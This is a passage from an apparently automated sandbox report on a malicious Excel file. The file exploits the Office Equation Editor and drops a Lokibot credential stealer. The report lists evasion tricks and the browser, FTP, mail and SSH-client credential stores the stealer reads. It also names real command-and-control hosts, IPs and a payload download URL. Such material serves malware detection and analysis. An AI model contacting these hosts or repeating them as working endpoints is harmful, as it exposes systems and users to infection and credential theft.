Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: MV FORTUNE TRADER.xlsx Stream path 'EncryptedPackage' entropy: 7.99992623739 (max. 8.0)

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 948 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403D74 FindFirstFileW, 4_2_00403D74

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h] 4_2_0040317B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022092B mov eax, dword ptr fs:[00000030h] 4_2_0022092B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h] 4_2_00220D90
Source: C:\Users\Public\vbc.exe Code function: 4_2_002233CB mov eax, dword ptr fs:[00000030h] 4_2_002233CB
Source: C:\Users\Public\vbc.exe Code function: 4_2_052593E3 push dword ptr fs:[00000030h] 4_2_052593E3
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap, 4_2_00402B7C

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2375184819.00000000054C0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406069 GetUserNameW, 4_2_00406069
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Lokibot
Source: Yara match File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Users\Public\vbc.exe Code function: HeapCreate, PopPassword 4_2_0040D069
Source: C:\Users\Public\vbc.exe Code function: HeapCreate, SmtpPassword 4_2_0040D069
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 353332 Sample: MV FORTUNE TRADER.xlsx Startdate: 16/02/2021 Architecture: WINDOWS Score: 100 27 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->27 29 Multi AV Scanner detection for domain / URL 2->29 31 Found malware configuration 2->31 33 17 other signatures 2->33 6 EQNEDT32.EXE 15 2->6         started        11 EXCEL.EXE 37 19 2->11         started        process3 dnsIp4 21 stdyrusschinetwomast.dns.army 103.141.138.123, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 6->21 23 cutt.ly 172.67.8.238, 443, 49165 CLOUDFLARENETUS United States 6->23 17 C:\Users\user\AppData\Local\...\regasm[1].exe, PE32 6->17 dropped 19 C:\Users\Public\vbc.exe, PE32 6->19 dropped 35 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->35 13 vbc.exe 13 6->13         started        file5 signatures6 process7 dnsIp8 25 becharnise.ir 185.208.180.121, 49168, 80 AMINIDCIR Iran (ISLAMIC Republic Of) 13->25 37 Multi AV Scanner detection for dropped file 13->37 39 Detected unpacking (changes PE section rights) 13->39 41 Detected unpacking (overwrites its own PE header) 13->41 43 6 other signatures 13->43 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.8.238
 unknown United States
13335 CLOUDFLARENETUS false
103.141.138.123
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true
185.208.180.121
 unknown Iran (ISLAMIC Republic Of)
48147 AMINIDCIR true

Contacted Domains

Name IP Active
cutt.ly 172.67.8.238 true
becharnise.ir 185.208.180.121 true
stdyrusschinetwomast.dns.army 103.141.138.123 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://kbfvzoboss.bid/alien/fre.php true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://alphastand.win/alien/fre.php true
  • 10%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://alphastand.trade/alien/fre.php true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe true
  • 10%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://alphastand.top/alien/fre.php true
  • Avira URL Cloud: safe
 unknown
http://becharnise.ir/fa13/fre.php true
  • Avira URL Cloud: safe
 unknown